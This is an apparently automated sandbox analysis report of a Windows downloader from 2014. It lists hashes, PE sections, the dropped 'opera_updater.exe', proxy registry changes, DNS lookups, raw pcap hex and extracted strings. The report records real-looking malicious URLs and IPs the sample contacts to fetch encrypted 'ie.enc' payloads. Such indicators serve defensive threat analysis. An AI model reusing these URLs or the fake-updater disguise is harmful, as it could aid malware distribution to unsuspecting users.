Analysis Date2014-10-04 17:34:43
MD505c4965fefeb1b07cdd75b31cb101e83
SHA14f484c6904ec466da8ef3ab0e6aa3a48e5fad722

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 1cfe640fb916f9e71e2f42ce9463b6e6 sha1: d3cefe831eba88d17380b6e877f968ab01e72878 size: 6144
Section.rdata md5: 5991a0937ea1c73a6ea7d2b50760dccf sha1: b09ba9081a37296905432830e2b7a3f680249f52 size: 1536
Section.data md5: 36f425ac30a34478057dae27a1407f15 sha1: 27c149c9c2f3499e5e8e775de3eeba3e88845640 size: 512
Section.rsrc md5: d312230fc901e21ad5d01f3359ba6e14 sha1: 9a3ea68fc338ca5068121b66142c23539c4c2819 size: 10240
Section.reloc md5: 5941791c6b31ac52e41a5ea0912259d3 sha1: 953eb4ea14eb81b605c22a5b1c6a2a709e64de33 size: 512
Timestamp2014-02-05 03:55:00
PEhash2394682c218c1f7651bd92f22a4a09342e6bc7ab
IMPhash7772dfa3e3a72b92db47c13e7be36e20

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\opera_updater.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSbsitacademy.com
Winsock DNSwahidexpress.com

Network Details:

DNSbsitacademy.com
Type: A
107.150.48.43
DNSwahidexpress.com
Type: A
103.15.74.65
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://bsitacademy.com/img/events/ie.enc
User-Agent: Updates downloader
HTTP GEThttp://wahidexpress.com/scripts/ie.enc
User-Agent: Updates downloader
Flows TCP192.168.1.1:1031 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1032 ➝ 103.15.74.65:80
Flows TCP192.168.1.1:1033 ➝ 107.150.48.43:80
Flows TCP192.168.1.1:1034 ➝ 103.15.74.65:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f696d67 2f657665 6e74732f   GET /img/events/
0x00000010 (00016)   69652e65 6e632048 5454502f 312e310d   ie.enc HTTP/1.1.
0x00000020 (00032)   0a416363 6570743a 20746578 742f2a2c   .Accept: text/*,
0x00000030 (00048)   20617070 6c696361 74696f6e 2f2a0d0a    application/*..
0x00000040 (00064)   55736572 2d416765 6e743a20 55706461   User-Agent: Upda
0x00000050 (00080)   74657320 646f776e 6c6f6164 65720d0a   tes downloader..
0x00000060 (00096)   486f7374 3a206273 69746163 6164656d   Host: bsitacadem
0x00000070 (00112)   792e636f 6d0d0a43 61636865 2d436f6e   y.com..Cache-Con
0x00000080 (00128)   74726f6c 3a206e6f 2d636163 68650d0a   trol: no-cache..
0x00000090 (00144)   0d0a                                  ..

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   47455420 2f736372 69707473 2f69652e   GET /scripts/ie.
0x00000010 (00016)   656e6320 48545450 2f312e31 0d0a4163   enc HTTP/1.1..Ac
0x00000020 (00032)   63657074 3a207465 78742f2a 2c206170   cept: text/*, ap
0x00000030 (00048)   706c6963 6174696f 6e2f2a0d 0a557365   plication/*..Use
0x00000040 (00064)   722d4167 656e743a 20557064 61746573   r-Agent: Updates
0x00000050 (00080)   20646f77 6e6c6f61 6465720d 0a486f73    downloader..Hos
0x00000060 (00096)   743a2077 61686964 65787072 6573732e   t: wahidexpress.
0x00000070 (00112)   636f6d0d 0a436163 68652d43 6f6e7472   com..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         


Strings
l
\1.scr
C:\0935c70d2f45427c197e0151b2feaedf6b65af3348a990783a8843a069520a5e
C:\11adfb9c62a4f19ce264757c2bb91316664909b3cef856a81a63a65d9cf286ea
C:\2045ce337e937c708d78344b3a73933ce8d62fd7cb016040bb6f7c65fa074a54
C:\261b8e2deddfba981de3ff5c307d5076cec6b33b147a4fc09255e5e19c3ea692
C:\28xWCaRL.exe
C:\2c45bc39672433a96a11c5c86e55207ed09259f779f3df84fcd7e9ae55cc8728
C:\2e79a3a7e5b38fbe12579d90d427fb029484d3bba48c50c0ae7109eff22d6517
C:\2qtQmAn5.exe
C:\39e4e9857c7623f403bedbdbfbd40b6fd78ea07ae98926b737bb20737029ff90
C:\49ygiNC8.exe
C:\4bFHR_eK.exe
C:\4LdX714E.exe
C:\4OAw6dNj.exe
C:\544157fc725476a422d518dd25ea4cbba136c3669c626b5bcec9b1de41ce5142
C:\5VC1VUrH.exe
C:\6265da723bc26958a437280ab2bf573c1a392378cc6fe30d6c498fc8605a959c
C:\7DXO_kKe.exe
C:\7ef23be7ee3c45d18ed6cd1b23677632ef2e42f63cebe27f1c27b9d6ed0c8628
C:\863ca453ab0dc39767ec24aafe755cba8ff6add522119a4dbeb33e7d08fcf8c2
C:\8c709e64eca709a20ee4e39a845b733e4118d53779b10eeda51a681ddb63cc8b
C:\8_i9MBDI.exe
C:\9a18829238c15724a79c0cd33c3de8911635d141957005b6fb2ae4d2770580ba
C:\ab28758b74cc5675f49a548c52154000b3df4696d62df6bc65c04c4db7d89c8a
C:\bIDXh8fM.exe
C:\BiHfydDx.exe
C:\bQvawNZh.exe
C:\cA2pLGDD.exe
C:\CbeEZlk6.exe
C:\CsVsjqHo.exe
C:\da2fe0111340f8ddebb4512dd02b3540ed87a4acf33d54dfcb49dfb0b397ca12
C:\dc3c00d8199a5ff950d3fbb1142286b7253c837168e1f76ae5b61d05111be50a
C:\DDK8eifn.exe
C:\Documents and Settings\Administrator\
C:\DsIw8_vu.exe
C:\e4bBUPTs.exe
C:\E79XI7Ib.exe
C:\f81339b2a71f8daa9a19ba20f0a59d6398404076316034b58dc355ce4a97ef6e
C:\f825fa5e5b588bce7ed879e029ac5ac330eee918df3dbaf25ca18267c63a8513
C:\gOB71HTb.exe
C:\GvUWNgLZ.exe
C:\h8sWWftq.exe
C:\hf0wZtwC.exe
C:\htrn7av8.exe
C:\h_vxN2Bn.exe
C:\hxKbSwDB.exe
C:\ibc_qtSL.exe
C:\Iko1eocT.exe
C:\Jqcon9aK.exe
C:\lBibPqWU.exe
C:\LFCbmJ9C.exe
C:\mMu0FlJa.exe
C:\mNs9cELS.exe
C:\NCAxk4ZA.exe
C:\nN83i0W4.exe
C:\nudgZb0T.exe
C:\NV9ce7iU.exe
C:\NYX_Td72.exe
C:\O_9pR1Hk.exe
C:\oUIV5nLJ.exe
C:\RZADBAnk.exe
C:\selCqtGF.exe
C:\sLw8ojW6.exe
C:\SQW1o1Gg.exe
C:\T0dznn84.exe
C:\T23yFkiN.exe
C:\TiFb8UpM.exe
C:\uCdC5Tvc.exe
C:\UowVcj_v.exe
C:\UP39lnyH.exe
C:\uyOiqQak.exe
C:\VAu9PqqO.exe
C:\VmiOUex9.exe
C:\Wmy1CWZP.exe
C:\Wv6q4jxH.exe
C:\wWw5GZtE.exe
C:\Y_6HTADx.exe
C:\YUXIYElr.exe
C:\_yxYHN3a.exe
C:\ZtyyIqaE.exe
:	;);4;
4%5*5N5U5\5c5i5q5w5~5
5%6I6Y6y6
7%7*7/7?7J7X7^7
7D9Y9^9h9n9w9
absent
_acmdln
_adjust_fdiv
Africa
AhAuhh
AWVAf9
Bagdad
BeginPaint
button
COMCTL32.dll
_controlfp
CreateFileA
CreateWindowExA
:D,*~aB?
@.data
DefWindowProcA
DispatchMessageA
DragQueryFileA
EndPaint
_except_handler3
GDI32.dll
__getmainargs
GetMessageA
GetModuleHandleA
GetStartupInfoA
;H7-G@
hAAhAA
InitCommonControlsEx
_initterm
iRichu
k{.cee
KERNEL32.dll
KXG[O_
lantie
MSVCRT.dll
 ';(&NK:&]9
o7U"o7U"
__p__commode
__p__fmode
PostQuitMessage
PuZN=0
`.rdata
RegisterClassA
@.reloc
SendMessageA
__set_app_type
__setusermatherr
SHELL32.dll
ShowWindow
solienty
static
TextOutA
!This program cannot be run in DOS mode.
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateMessage
uAhhAhA
USER32.dll
_XcptFilter
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"/></requestedPrivileges></security></trustInfo></assembly>(